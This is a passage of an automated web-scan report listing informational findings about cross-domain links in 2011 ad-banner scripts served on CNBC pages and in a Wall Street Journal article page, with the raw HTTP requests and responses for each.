Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=14302:28901/9608:2042/17985:6712/17038:5934/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:37:47 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 17:15:02 GMT
ETag: "644b56-102d-4a5d768d23180"
Accept-Ranges: bytes
Content-Length: 5062
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-0?mpt=7117460224" target="_blank"><img src="http://img-cdn.mediaplex.com/0/14302/119028/Selector_300x250.gif" width="300" height="250" border="0" alt="">
...[SNIP]...

15.63. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17985/125897/728x90_Mits_Res_060111.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786&mpt=835797786&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?

The response contains the following link to another domain:

http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?http://altfarm.mediaplex.com/ad/ck/17985-125897-6712-46?mpt=835797786

Request

GET /content/0/17985/125897/728x90_Mits_Res_060111.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786&mpt=835797786&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62? HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244493867&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:14:58 GMT
Server: Apache
Last-Modified: Thu, 02 Jun 2011 17:40:14 GMT
ETag: "57b48a-f71-4a4be212a3b80"
Accept-Ranges: bytes
Content-Length: 4991
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?http://altfarm.mediaplex.com/ad/ck/17985-125897-6712-46?mpt=835797786" target="_blank"><img src="http://img-cdn.mediaplex.com/0/17985/125897/728x90_Mits_Res_060111.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

15.64. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-1%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768033%26Perf_Tracker_2%3D0001004438%26Perf_Tracker_3%3D1183%26adid%3D328072%26imp_id%3D2884646768651692769%26fcid%3D328062%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240959564892%26imp_rvr_id%3D240959564892&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA.%2Fcnd%3D%216gSCKQj4uwIQrp0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D

The response contains the following link to another domain:

http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA./cnd=!6gSCKQj4uwIQrp0UGIf5AiAD/referrer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308248220548%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860/clickenc=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000768033%2Fmnum%3D0001004438%2Fcstr%3D43472790%3D_4dfa489d%2C2003200856%2C768033%5E1004438%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D43472790%2Foptn%3D64%3Ftrg%3Dhttp://rover.ebay.com/rover/1/711-126780-2042-1/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892

Request

GET /content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-1%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768033%26Perf_Tracker_2%3D0001004438%26Perf_Tracker_3%3D1183%26adid%3D328072%26imp_id%3D2884646768651692769%26fcid%3D328062%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240959564892%26imp_rvr_id%3D240959564892&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA.%2Fcnd%3D%216gSCKQj4uwIQrp0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:17:07 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 17:36:55 GMT
ETag: "372783-104c-4a41d2692bbc0"
Accept-Ranges: bytes
Content-Length: 8850
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA./cnd=!6gSCKQj4uwIQrp0UGIf5AiAD/referrer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308248220548%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860/clickenc=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000768033%2Fmnum%3D0001004438%2Fcstr%3D43472790%3D_4dfa489d%2C2003200856%2C768033%5E1004438%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D43472790%2Foptn%3D64%3Ftrg%3Dhttp://rover.ebay.com/rover/1/711-126780-2042-1/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892" target="_blank"><img src="http://img-cdn.mediaplex.com/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

15.65. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-0%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768034%26Perf_Tracker_2%3D0001004441%26Perf_Tracker_3%3D1183%26adid%3D328092%26imp_id%3D425067938274493911%26fcid%3D328082%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240963344343%26imp_rvr_id%3D240963344343&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA.%2Fcnd%3D%213AQEKQj4uwIQoJ0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253D

The response contains the following link to another domain:

http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA./cnd=!3AQEKQj4uwIQoJ0UGIf5AiAD/referrer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F728x90%2Fatf%3Ft%3D1308248219121%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860/clickenc=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000768034%2Fmnum%3D0001004441%2Fcstr%3D27582677%3D_4dfa489d%2C2306156771%2C768034%5E1004441%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D27582677%2Foptn%3D64%3Ftrg%3Dhttp://rover.ebay.com/rover/1/711-126780-2042-0/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343

Request

GET /content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-0%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768034%26Perf_Tracker_2%3D0001004441%26Perf_Tracker_3%3D1183%26adid%3D328092%26imp_id%3D425067938274493911%26fcid%3D328082%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240963344343%26imp_rvr_id%3D240963344343&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA.%2Fcnd%3D%213AQEKQj4uwIQoJ0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248219121&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:17:06 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 18:31:13 GMT
ETag: "289520-1042-4a41de8c3de40"
Accept-Ranges: bytes
Content-Length: 8832
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA./cnd=!3AQEKQj4uwIQoJ0UGIf5AiAD/referrer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F728x90%2Fatf%3Ft%3D1308248219121%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860/clickenc=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000768034%2Fmnum%3D0001004441%2Fcstr%3D27582677%3D_4dfa489d%2C2306156771%2C768034%5E1004441%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D27582677%2Foptn%3D64%3Ftrg%3Dhttp://rover.ebay.com/rover/1/711-126780-2042-0/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343" target="_blank"><img src="http://img-cdn.mediaplex.com/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

15.66. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052702303714704576384051388321740.html

Issue detail

The page was loaded from a URL containing a query string:

http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read

The response contains the following links to other domains:

http://allthingsd.com/
http://allthingsd.com/?reflink=DNH_EUR&mod=WSJ_footer
http://bigcharts.marketwatch.com/
http://bigcharts.marketwatch.com/?mod=WSJ_footer
http://ie8.smoothfusion.com/WallStreetJournal/view.aspx
http://it-jobs.fins.com/?mod=WSJ_footer
http://online.barrons.com/home
http://online.barrons.com/public/main?mod=WSJ_footer
http://sales-jobs.fins.com/?mod=WSJ_footer
http://the-acap.org/acap-enabled.php?mod=WSJ_footer
http://vse.marketwatch.com/Game/Homepage.aspx
http://vse.marketwatch.com/Game/Homepage.aspx?mod=WSJ_footer
http://wsj.iamplify.com/?mod=WSJ_footer
http://wsjradio.com/?mod=WSJ_footer
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
http://www.dj.com/?mod=WSJ_footer
http://www.djreprints.com/?mod=WSJ_footer
http://www.dowjones.com/careers.asp?mod=WSJ_footer
http://www.efinancialnews.com/
http://www.facebook.com/wsj
http://www.fins.com/
http://www.fins.com/?mod=WSJ_footer
http://www.fins.com/finance/?mod=WSJ_footer
http://www.marketwatch.com/
http://www.marketwatch.com/?siteid=wsj&dist=freedjsiteslink&mod=WSJ_footer
http://www.smartmoney.com/
http://www.smartmoney.com/?mod=WSJ_footer
http://www.wallstreetjournal.com/
http://www.wsj-asia.com/flp/about.html?mod=WSJ_footer
http://www.wsjdigital.com/?mod=WSJ_footer
http://www.wsjlocal.com/?mod=WSJ_footer
http://www.wsjradio.com/
http://www.wsjwine.com/
https://www.wsjsafehouse.com/

Request

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:33 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep09 - Thu 06/16/11 - 04:12:36 EDT
Cache-Control: max-age=15
Expires: Thu, 16 Jun 2011 11:22:48 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 99009
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<li class="hat_tab" id="hat_tab2">
<a onclick="hat.track('MW')" href="http://www.marketwatch.com" id="hat_link2"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab3">
<a onclick="hat.track('BOL')" href="http://online.barrons.com/home" id="hat_link3"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab4">
<a onclick="hat.track('ATD')" href="http://allthingsd.com" id="hat_link4"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab6">
<a onclick="hat.track('FINS')" href="http://www.fins.com" id="hat_link5"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab7">
<a onclick="hat.track('SM')" href="http://www.smartmoney.com" id="hat_link6"></a>
...[SNIP]...
